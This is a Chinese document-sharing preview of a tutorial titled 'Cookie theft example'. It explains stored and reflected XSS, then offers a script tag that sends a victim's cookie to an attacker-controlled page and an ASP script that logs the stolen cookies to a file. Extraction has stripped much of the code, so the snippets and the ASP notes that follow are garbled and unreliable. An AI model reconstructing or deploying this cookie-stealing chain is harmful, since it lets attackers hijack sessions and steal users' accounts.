下载此文档

盗窃cookie实例.doc


文档分类:IT计算机 | 页数:约6页 举报非法文档有奖
1/6
下载提示
  • 1.该资料是网友上传的,本站提供全文预览,预览什么样,下载就什么样。
  • 2.下载该文档所得收入归上传者、原创者。
  • 3.下载的文档,不会出现我们的网址水印。
1/6 下载此文档
文档列表 文档介绍
:一类是存储型XSS,主要出现在让用户输入数据,供其他浏览此页的用户进行查看的地方,包括留言、评论、博客日志和各类表单等。应用程序从数据库中查询数据,在页面中显示出来,攻击者在相关页面输入恶意的脚本数据后,用户浏览此类页面就可能受到攻击。另外一类是参数型XSS,主要是将脚本加入URL地址的程序参数里,参数进入程序后在页面直接输出脚本内容,用户点击类似的恶意链接就可能受到攻击。传统的XSS攻击都是盘算如何盗取客户端COOKIE,然后劫持客户端和WEB服务端的会话,其他还有利用XSS进行网络钓鱼的攻击方法,这类攻击都是针对客户端进行攻击,而近年流行的XSSWORM攻击方式,是通过AJAX技术把恶意的XSS数据感染到每一个用户,可以对WEB服务造成很大的影响,间接实现了对WEB服务端的攻击。《也就是这种》<script>='?msg='+</script>相信这一句大家都熟悉吧我们还要用到一个asp接口啊<%thisfile=("")msg=Request("msg")setfs=("")setthisfile=(thisfile,8,True,0)("========cookie:"&msg&"======================[by:]=黑防")=nothing%>,其中大多数方法和属性是作为实用程序的功能的,语法格式为::creareobject:创建服务器组件的实例。execute::返回一个描述错误条件的asperror对象htmlencode;将html编码应用到指定的字符串mappath:将指定的虚拟路径,无论是当前服务器上的绝对路径还是当前页的相对路径,映射为物理路径transfer::将url编码规则,包括转移字符,应用到字符串。,语法格式如下:(path)其中参数path指定要映射物理目录的相对或虚拟路径。如果path以一个正斜线(/)或反斜线(\)开始,mappath方法将返回路径时将path视为完整的虚拟路径;如果path不是斜线开始,。。提供对计算机文件系统的访问,包括用来创建,删除,和获得有关信息以及用来操作驱动器,文件夹和文件的方法和属性。,首先创建f

盗窃cookie实例 来自淘豆网m.daumloan.com转载请标明出处.

相关文档 更多>>
非法内容举报中心
文档信息
  • 页数6
  • 收藏数0 收藏
  • 顶次数0
  • 上传人小枷
  • 文件大小28 KB
  • 时间2019-01-23
最近更新